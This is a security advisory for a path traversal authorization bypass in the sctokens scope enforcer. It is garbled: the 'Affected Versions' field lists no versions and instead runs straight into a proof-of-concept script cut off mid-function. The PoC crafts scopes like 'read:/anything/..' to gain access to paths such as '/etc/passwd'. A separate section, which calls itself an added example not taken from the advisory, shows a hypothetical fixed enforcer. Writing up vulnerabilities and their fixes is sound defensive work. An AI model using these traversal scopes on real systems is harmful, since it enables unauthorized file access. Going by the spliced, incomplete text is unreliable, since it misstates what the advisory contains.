# Vulnerability Summary: Path Traversal in sctokens Leading to Authorization Bypass

## Vulnerability Overview

**CVE ID**: CVE-2025-23227

**Severity**: High (8.1/10)

**Affected Versions**:

```python
    "/home"
    # urllibs.normalize_path("/home/user2") -> "/home/user2"
    # Since "/home/user2".startswith("/home/") is True, authorization is granted
    print("\nTesting authorization...")
    is_authorized = enforcer.test(token, "read", requested_path)
    print(f"Is authorized: {is_authorized}")

    if is_authorized:
        print("\n[VULNERABILITY CONFIRMED]")
        print(f"The Enforcer ALLOWED access to {requested_path}")
        print("Even though the scope was nominally restricted to /home/user1/..")
        print("This bypasses the intended directory isolation.")
    else:
        print("\n[VULNERABILITY NOT REPRODUCED]")
        print("The Enforcer blocked the access attempt.")

    # Second example: root directory traversal
    print("\n--- Example 2: Root Traversal ---")
    token['scope'] = "read:/anything/.."  # Resolves to /
    requested_path = "/etc/passwd"  # or any sensitive path
    print(f"Token scope: {token['scope']}")
    print(f"Requested path: {requested_path}")

    is_authorized = enforcer.test(token, "read", requested_path)
    print(f"Is authorized: {is_authorized}")

    if is_authorized:
        print("[VULNERABILITY CONFIRMED] Root traversal allowed access to ALL paths!")


if __name__ == "__main__":
    test_path_traversal_bypass()
```

---

## Fix Solution

Validate that the path in the scope does not contain `..` components after decoding but before normalization. Also ensure that any errors thrown during the validation process are subclasses of `ValidationFailure`, so that the `Enforcer.test` method handles them correctly.
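The following is an added example, not code from the advisory or from the affected project, that contrasts the vulnerable ordering (normalize the scope path, then prefix-compare) with the fix described above (decode, reject any `..` component, and only then normalize), and shows why validation errors must derive from `ValidationFailure`. `Enforcer`, `ValidationFailure`, `PathTraversalFailure`, `normalize_path` and `validate_scope_path` here are hypothetical stand-ins with the same roles as the names in the summary, not the real library's API; the `"read:/path"` scope format and the token dictionaries are constructed sample inputs.

```python
# Added example: minimal enforcer showing the normalize-then-compare bypass
# and the decode -> reject '..' -> normalize fix. All names are hypothetical.
import posixpath
from urllib.parse import unquote


class ValidationFailure(Exception):
    """Base class: Enforcer.test turns any subclass into a plain deny."""


class PathTraversalFailure(ValidationFailure):
    """Raised when a scope path carries a '..' component."""


def normalize_path(path: str) -> str:
    """Collapse '.', '..' and duplicate slashes (what the vulnerable code did first)."""
    return posixpath.normpath("/" + path.lstrip("/"))


def _is_under(base: str, req: str) -> bool:
    """True if req equals base or lies inside the base directory."""
    prefix = base if base.endswith("/") else base + "/"
    return req == base or req.startswith(prefix)


def _split_scope(scope: str):
    """Constructed scope format: 'read:/home/user1' -> ('read', '/home/user1')."""
    authz, sep, path = scope.partition(":")
    if not sep:
        raise ValidationFailure(f"scope {scope!r} has no path component")
    return authz, path


def validate_scope_path(scope_path: str) -> str:
    """The fix: decode, reject '..' components, and only then normalize.

    Decoding first means a percent-encoded '%2e%2e' cannot slip past the check;
    checking before normalization means '/home/user1/..' is refused instead of
    silently becoming '/home'.
    """
    decoded = unquote(scope_path)
    if ".." in decoded.split("/"):
        raise PathTraversalFailure(f"scope path {scope_path!r} contains '..'")
    return normalize_path(decoded)


class Enforcer:
    def __init__(self, fixed: bool):
        self.fixed = fixed

    def test(self, token: dict, authz: str, requested_path: str) -> bool:
        """Return True only if the token's scope covers (authz, requested_path)."""
        try:
            scope_authz, scope_path = _split_scope(token["scope"])
            if scope_authz != authz:
                return False
            if self.fixed:
                base = validate_scope_path(scope_path)
            else:
                # Vulnerable ordering: '..' is collapsed before anyone looks at it.
                base = normalize_path(unquote(scope_path))
            return _is_under(base, normalize_path(requested_path))
        except ValidationFailure:
            # Every validation error is a deny, never an unhandled exception
            # that could crash the caller or be mistaken for success.
            return False


if __name__ == "__main__":
    token = {"scope": "read:/home/user1/.."}
    print("vulnerable:", Enforcer(fixed=False).test(token, "read", "/home/user2"))
    print("fixed:     ", Enforcer(fixed=True).test(token, "read", "/home/user2"))
```

Because `PathTraversalFailure` subclasses `ValidationFailure`, the fixed enforcer denies the traversal scopes without special-casing them; a new validation rule that raised a bare `Exception` instead would propagate out of `test` rather than producing a deny, which is the second half of the fix the summary asks for.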